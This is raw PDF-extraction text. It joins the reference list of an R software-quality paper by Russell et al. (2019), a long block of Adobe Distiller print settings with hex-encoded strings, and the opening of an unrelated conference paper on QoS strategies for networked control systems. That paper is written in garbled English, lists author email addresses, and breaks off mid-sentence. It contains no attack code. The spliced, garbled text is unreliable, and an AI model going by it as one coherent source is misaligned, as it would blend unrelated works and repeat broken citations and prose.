https://CRAN.R-project.org/package=future.apply https://dzone.com/articles/applying-8020-rule-software https://CRAN.R-project.org/package=parallelMap https://CRAN.R-project.org/package=RUnit https://CRAN.R-project.org/package=RUnit https://lulu.com https://CRAN.R-project.org/package=doMC https://CRAN.R-project.org/package=doSNOW https://CRAN.R-project.org/package=doParallel https://CRAN.R-project.org/package=foreach https://web.archive.org/web/20150726134212/http://blog.james-carr.org:80/2006/11/03/tdd-anti-patterns/ https://web.archive.org/web/20150726134212/http://blog.james-carr.org:80/2006/11/03/tdd-anti-patterns/ http://dx.doi.org/10.7717/peerj-cs.175 https://peerj.com/computer-science/ Chang W, Luraschi J. 2018. profvis: interactive visualizations for profiling R code. Available at https://CRAN.R-project.org/package=profvis. Dehaghani SMH, Hajrahimi N. 2013. Which factors affect software projects maintenance cost more? Acta Informatica Medica 21(1):63–66 DOI 10.5455/AIM.2012.21.63-66. DeWitt P, Bennett T, Feinstein J, Russell S. 2017. pccc: pediatric complex chronic conditions. Available at https://cran.r-project.org/package=pccc. Dragulescu AA, Arendt C. 2018. xlsx: read, write, format excel 2007 and excel 97/2000/XP/2003 files. Available at https://CRAN.R-project.org/package=xlsx. Eckert A. 2018. parallelDist: parallel distance matrix computation using multiple threads. Available at https://CRAN.R-project.org/package=parallelDist. Eddelbuettel D, Balamuta JJ. 2017. Extending R with C++: a brief introduction to Rcpp. PeerJ 5:e3188v1 DOI 10.7287/peerj.preprints.3188v1. Feinerer I, Theussl S, Buchta C. 2015. DSL: distributed storage and list. Available at https://CRAN. R-project.org/package=DSL. Feinstein JA, Russell S, DeWitt PE, Feudtner C, Dai D, Bennett TD. 2018. R package for pediatric complex chronic condition classification. JAMA Pediatrics 172(6):596 DOI 10.1001/jamapediatrics.2018.0256. Feudtner C, Christakis DA, Connell FA. 2000. Pediatric deaths attributable to complex chronic conditions: a population-based study of Washington state, 1980–1997. Pediatrics 106:205–209. Feudtner C, Feinstein JA, Zhong W, Hall M, Dai D. 2014. Pediatric complex chronic conditions classification system version 2: updated for ICD-10 and complex medical technology dependence and transplantation. BMC Pediatrics 14(1):199 DOI 10.1186/1471-2431-14-199. Fucci D, Scanniello G, Romano S, Shepperd M, Sigweni B, Uyaguari F, Turhan B, Juristo N, Oivo M. 2016. An external replication on the effects of test-driven development using a multi-site blind analysis approach. In: Proceedings of the 10th ACM/IEEE International Symposium on Empirical Software Engineering and Measurement. ESEM ‘16, Vol. 3. New York: ACM, 1–3, 10. Gaslam B. 2017. unitizer: interactive R unit tests. Available at https://CRAN.R-project.org/ package=unitizer. Gillespie C, Lovelace R. 2017. Efficient R programming: a practical guide to smarter programming. Sebastopol: O’Reilly Media. Glass RL. 2001. Frequently forgotten fundamental facts about software engineering. IEEE Software 18(3):112–111 DOI 10.1109/MS.2001.922739. Grosjean P. 2014. SciViews-R: A GUI API for R. Mons: UMONS. Hansson DH. 2014. TDD is dead. Long live testing. (DHH). Available at http://david.heinemeierhansson.com/2014/tdd-is-dead-long-live-testing.html. Hester J. 2018. bench: high precision timing of R expressions. Available at https://cran.r-project.org/ package=bench. Hyde R. 2009. The fallacy of premature optimization. Ubiquity 2009:1 DOI 10.1145/1569886.1513451. Izrailev S. 2014. tictoc: functions for timing R scripts, as well as implementations of Stack and List structures. Available at https://CRAN.R-project.org/package=tictoc. Jones C, Bonsignour O. 2011. The economics of software quality. Upper Saddle River: Addison- Wesley Professional. Kane M, Emerson J, Weston S. 2013. Scalable strategies for computing with massive data. Journal of Statistical Software 55(14):1–19 DOI 10.18637/jss.v055.i14. Russell et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.175 23/26 https://CRAN.R-project.org/package=profvis http://dx.doi.org/10.5455/AIM.2012.21.63-66 https://cran.r-project.org/package=pccc https://CRAN.R-project.org/package=xlsx https://CRAN.R-project.org/package=parallelDist http://dx.doi.org/10.7287/peerj.preprints.3188v1 https://CRAN.R-project.org/package=DSL https://CRAN.R-project.org/package=DSL http://dx.doi.org/10.1001/jamapediatrics.2018.0256 http://dx.doi.org/10.1186/1471-2431-14-199 https://CRAN.R-project.org/package=unitizer https://CRAN.R-project.org/package=unitizer http://dx.doi.org/10.1109/MS.2001.922739 http://david.heinemeierhansson.com/2014/tdd-is-dead-long-live-testing.html https://cran.r-project.org/package=bench https://cran.r-project.org/package=bench http://dx.doi.org/10.1145/1569886.1513451 https://CRAN.R-project.org/package=tictoc http://dx.doi.org/10.18637/jss.v055.i14 http://dx.doi.org/10.7717/peerj-cs.175 https://peerj.com/computer-science/ Kanewala U, Bieman JM. 2014. Testing scientific software: a systematic literature review. Information and Software Technology 56(10):1219–1232 DOI 10.1016/j.infsof.2014.05.006. Kelleher C, Pausch R. 2005. Lowering the barriers to programming: a taxonomy of programming environments and languages for novice programmers. ACM Computing Surveys 37(2):83–137 DOI 10.1145/1089733.1089734. Klevtsov A, Antonov A, Upravitelev P. 2018. benchr: high precise measurement of R expressions execution time. Available at https://cran.r-project.org/package=benchr. Klik M, Collet Y, Facebook. 2018. fst: lightning fast serialization of data frames for R. Available at https://CRAN.R-project.org/package=fst. Knuth DE. 1974. Structured programming with go to statements. ACM Computing Surveys 6(4):261–301 DOI 10.1145/356635.356640. Koskinen J. 2015. Software maintenance costs. Available at https://wiki.uef.fi/download/ attachments/38669960/SMCOSTS.pdf. Kusnierczyk W, Eddelbuettel D, Hasselman B. 2012. rbenchmark: benchmarking routine for R. Available at https://CRAN.R-project.org/package=rbenchmark. Leek JT, Peng RD. 2015. Opinion: reproducible research can still be wrong: adopting a prevention approach. Proceedings of the National Academy of Sciences of the United States of America 112(6):1645–1646 DOI 10.1073/pnas.1421412111. Lentin J, Hennessey A. 2017. unittest: TAP-compliant unit testing. Available at https://CRAN.R- project.org/package=unittest. Luraschi J, Kuo K, Ushey K, Allaire JJ, Macedo S, RStudio, Foundation TAS. 2018. sparklyr: R interface to Apache Spark. Available at https://CRAN.R-project.org/package=sparklyr. Matloff N. 2016. Software alchemy: turning complex statistical computations into embarrassingly-parallel ones. Journal of Statistical Software 71(4):1–15 DOI 10.18637/jss.v071.i04. Mersmann O. 2018. microbenchmark: accurate timing functions. Available at https://CRAN.R- project.org/package=microbenchmark. Micro Focus. 2018. Unified functional testing. Available at https://software.microfocus.com/en-us/ products/unified-functional-automated-testing/overview (accessed 12 April 2018). Moilanen J. 2014. Test driven development details. Available at https://github.com/educloudalliance/ educloud-development/wiki/Test-Driven-Development-details (accessed 12 April 2018). Nolan R, Padilla-Parra S. 2017. exampletestr—An easy start to unit testing R packages. Wellcome Open Research 2:31 DOI 10.12688/wellcomeopenres.11635.2. Nutter B, Lane S. 2018. redcapAPI: accessing data from REDCap projects using the API. Zenodo. DOI 10.5281/zenodo.592833. Osborne JM, Bernabeu MO, Bruna M, Calderhead B, Cooper J, Dalchau N, Dunn S-J, Fletcher AG, Freeman R, Groen D, Knapp B, McInerny GJ, Mirams GR, Pitt-Francis J, Sengupta B, Wright DW, Yates CA, Gavaghan DJ, Emmott S, Deane C. 2014. Ten simple rules for effective computational research. PLOS Computational Biology 10(3):e1003506 DOI 10.1371/journal.pcbi.1003506. Prins P, De Ligt J, Tarasov A, Jansen RC, Cuppen E, Bourne PE. 2015. Toward effective software solutions for big biology. Nature Biotechnology 33(7):686–687 DOI 10.1038/nbt.3240. Python Wiki Contributors. 2018. Performance tips. Available at https://wiki.python.org/moin/ PythonSpeed/PerformanceTips (accessed 12 April 2018). Russell et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.175 24/26 http://dx.doi.org/10.1016/j.infsof.2014.05.006 http://dx.doi.org/10.1145/1089733.1089734 https://cran.r-project.org/package=benchr https://CRAN.R-project.org/package=fst http://dx.doi.org/10.1145/356635.356640 https://wiki.uef.fi/download/attachments/38669960/SMCOSTS.pdf https://wiki.uef.fi/download/attachments/38669960/SMCOSTS.pdf https://CRAN.R-project.org/package=rbenchmark http://dx.doi.org/10.1073/pnas.1421412111 https://CRAN.R-project.org/package=unittest https://CRAN.R-project.org/package=unittest https://CRAN.R-project.org/package=sparklyr http://dx.doi.org/10.18637/jss.v071.i04 https://CRAN.R-project.org/package=microbenchmark https://CRAN.R-project.org/package=microbenchmark https://software.microfocus.com/en-us/products/unified-functional-automated-testing/overview https://software.microfocus.com/en-us/products/unified-functional-automated-testing/overview https://github.com/educloudalliance/educloud-development/wiki/Test-Driven-Development-details https://github.com/educloudalliance/educloud-development/wiki/Test-Driven-Development-details http://dx.doi.org/10.12688/wellcomeopenres.11635.2 http://dx.doi.org/10.5281/zenodo.592833 http://dx.doi.org/10.1371/journal.pcbi.1003506 http://dx.doi.org/10.1038/nbt.3240 https://wiki.python.org/moin/PythonSpeed/PerformanceTips https://wiki.python.org/moin/PythonSpeed/PerformanceTips http://dx.doi.org/10.7717/peerj-cs.175 https://peerj.com/computer-science/ R Core Team. 2018. R: a language and environment for statistical computing. Vienna: R Foundation for Statistical Computing. Available at http://www.R-project.org/. Ranorex GmbH. 2018. Ranorex. Available at https://www.ranorex.com (accessed 12 April 2018). Reese J. 2018. Best practices for writing unit tests. Available at https://docs.microsoft.com/en-us/ dotnet/core/testing/unit-testing-best-practices. Robinson E. 2017. Making R code faster : a case study. Available at https://robinsones.github.io/ Making-R-Code-Faster-A-Case-Study/. Rooney P. 2002. Microsoft’s CEO: 80-20 rule applies to bugs, not just features. Available at http://www.crn.com/news/security/18821726/microsofts-ceo-80-20-rule-applies-to-bugs-not-just- features.htm. Sandve GK, Nekrutenko A, Taylor J, Hovig E. 2013. Ten simple rules for reproducible computational research. PLOS Computational Biology 9(10):e1003285 DOI 10.1371/journal.pcbi.1003285. Selenium Contributors. 2018. Selenium. Available at https://www.seleniumhq.org (accessed 12 April 2018). Sommerville I. 2015. Software engineering. Boston: Pearson. Sommerville I. 2016. Giving up on test-first development. Available at http://iansommerville.com/ systems-software-and-technology/giving-up-on-test-first-development/. Stack Overflow Contributors. 2017. Unit testing anti-patterns catalogue. Available at https://stackoverflow.com/questions/333682/unit-testing-anti-patterns-catalogue (accessed 12 April 2018). The Joint Task Force on Computing Curricula. 2015. Curriculum guidelines for undergraduate degree programs in software engineering. New York: ACM. Tierney L, Jarjour R. 2016. proftools: profile output processing tools for R. Available at https:// CRAN.R-project.org/package=proftools. Tierney L, Rossini AJ, Li N, Sevcikova H. 2018. snow: simple network of workstations. Available at https://CRAN.R-project.org/package=snow. Weston S. 2017. doMPI: foreach parallel adaptor for the Rmpi package. Available at https://CRAN. R-project.org/package=doMPI. Wickham H. 2011. testthat: get started with testing. R Journal 3:5–10. Wickham H. 2014a. profr: an alternative display for profiling information. Available at https:// CRAN.R-project.org/package=profr. Wickham H. 2014b. Advanced R. Boca Raton: Chapman and Hall/CRC. Wickham H, RStudio, Feather developers, Google, LevelDB Authors. 2016. feather: R bindings to the feather “API”. Available at https://CRAN.R-project.org/package=feather. Wikipedia contributors. 2017a. SUnit — Wikipedia, the free encyclopedia. Available at https://en.wikipedia.org/w/index.php?title=SUnit&oldid=815835062. Wikipedia contributors. 2017b. XUnit — Wikipedia, the free encyclopedia. Available at https://en.wikipedia.org/w/index.php?title=XUnit&oldid=807299841. Wilson G. 2016. Software carpentry: lessons learned. F1000Research 3:62 DOI 10.12688/f1000research.3-62.v2. Wilson G, Aruliah DA, Brown CT, Hong NPC, Davis M, Guy RT, Haddock SHD, Huff KD, Mitchell IM, Plumbley MD, Waugh B, White EP, Wilson P. 2014. Best practices for scientific computing. PLOS Biology 12(1):e1001745 DOI 10.1371/journal.pbio.1001745. Russell et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.175 25/26 http://www.R-project.org/ https://www.ranorex.com https://docs.microsoft.com/en-us/dotnet/core/testing/unit-testing-best-practices https://docs.microsoft.com/en-us/dotnet/core/testing/unit-testing-best-practices https://robinsones.github.io/Making-R-Code-Faster-A-Case-Study/ https://robinsones.github.io/Making-R-Code-Faster-A-Case-Study/ http://www.crn.com/news/security/18821726/microsofts-ceo-80-20-rule-applies-to-bugs-not-just-features.htm http://www.crn.com/news/security/18821726/microsofts-ceo-80-20-rule-applies-to-bugs-not-just-features.htm http://dx.doi.org/10.1371/journal.pcbi.1003285 https://www.seleniumhq.org http://iansommerville.com/systems-software-and-technology/giving-up-on-test-first-development/ http://iansommerville.com/systems-software-and-technology/giving-up-on-test-first-development/ https://stackoverflow.com/questions/333682/unit-testing-anti-patterns-catalogue https://CRAN.R-project.org/package=proftools https://CRAN.R-project.org/package=proftools https://CRAN.R-project.org/package=snow https://CRAN.R-project.org/package=doMPI https://CRAN.R-project.org/package=doMPI https://CRAN.R-project.org/package=profr https://CRAN.R-project.org/package=profr https://CRAN.R-project.org/package=feather https://en.wikipedia.org/w/index.php?title=SUnit&oldid=815835062 https://en.wikipedia.org/w/index.php?title=XUnit&oldid=807299841 http://dx.doi.org/10.12688/f1000research.3-62.v2 http://dx.doi.org/10.1371/journal.pbio.1001745 http://dx.doi.org/10.7717/peerj-cs.175 https://peerj.com/computer-science/ Xie Y. 2018. testit: a simple package for testing R packages. Available at https://CRAN.R-project.org/ package=testit. Xie Y, Allaire JJ, Grolemund G. 2018. R markdown: the definitive guide. Boca Raton: Chapman and Hall/CRC. Xochellis J. 2010. The impact of the Pareto principle in optimization - CodeProject. Available at https://www.codeproject.com/Articles/49023/The-impact-of-the-Pareto-principle- in-optimization. Yu H. 2002. Rmpi: parallel statistical computing in R. R News 2:10–14. Russell et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.175 26/26 https://CRAN.R-project.org/package=testit https://CRAN.R-project.org/package=testit https://www.codeproject.com/Articles/49023/The-impact-of-the-Pareto-principle-in-optimization https://www.codeproject.com/Articles/49023/The-impact-of-the-Pareto-principle-in-optimization http://dx.doi.org/10.7717/peerj-cs.175 https://peerj.com/computer-science/ Software engineering principles to improve quality and performance of R software Introduction Analysis of R Packages on Cran Recommendations to Improve Quality and Performance Conclusion References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_g5e4e5fjf5g2ve5fuetfkkz5wq ---- Paper Title (use style: paper title) 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 108 The Design of QoS Guarantee Strategy Framework for Networked Control System Yang Weixia School of Computer Science and Engineering Xi'an Technological University Xi'an, 710021, Shaanxi, China e-mail: 1195862787@qq.com Xu Fei a , Wang Shaochang b School of Computer Science and Engineering Xi'an Technological University Xi'an, 710021, Shaanxi, China e-mail: a 29112462@qq.com b 1163401315@qq..com Abstract—For networked control systems such as packet loss and delay of the basic problems, this article launches the research from the perspective of network scheduling optimization, build the QoS semantic model and service model for networked control, puts forward the multi-level QoS guarantee strategy deployment algorithm and QoS, QoS access algorithm components; On a class of networked control middleware prototype system of network resources to meet of components and component deployment simulation experiment, the results show that by properly adjusting the bandwidth of the task node and priority, and controlling the efficient transmission of information, so as to shorten the network time delay, improve the network performance, increase the efficiency of the controller. Keywords-Networked Control; Middleware; Resources to Meet; Components Deployed I. INTRODUCTION The networked control system brings many advantages to the control system through network resource sharing, and introduces new challenges to the control circle. The complexity of the network control system is introduced by control system in the network of the characteristics of decision, such as network induced delay, packet loss, single packet of data and multiple packet transmission, packet random sequence and network scheduling problem, this article called "web services digital constraint" [1].Network control applications require the use of heterogeneous, diverse resources, in general use of these resources sharing, more requires collaboration between the various tasks, resource scheduling, task execution is complicated. The current network infrastructure and are based on "best effort" basis, quality of service is not fully guaranteed, multiple services collaboration use resources, performance and efficiency is also easy to cause the drop. Addressing these issues requires the introduction of the QoS mechanism. Ian Foster and other scholars have proposed the QoS framework based on the Globus Toolkit -- the Globus Architecture for Reservation and Allocation, GARA [2][3], which provides the middleware core layer and the end-to-end QoS guarantee for the service layer. GARA use "gramm for resource management, defines the generic description mechanism for all kinds of heterogeneous resources and provide unified control interface, but the lack of extensibility, implementation architecture can't applicable to the general field of networked control request. Professor at the university of Cardiff Rashid QoS management framework - G - QoSM [4], the use of the resources of QoS information registration, discovery and selection of reserve resources, resource allocation and task scheduling adaptive adjustment, the framework is the complete lack of QoS semantic modeling ability, change can not be very good to the business environment. Zeng et al. [5][6] proposed the service composition middleware based on maximization of user satisfaction, and gave two strategies for local task-level service selection and global collaborative allocation. The local service chooses to use the metric and weighted two steps to measure the service in the multidimensional QoS attribute. Literature [7] points out that the heterogeneous network environment put forward requirements definition scheme based on a known as the elastic constraints, the multi-objective problem is modeled as a compound option of knapsack problem, based 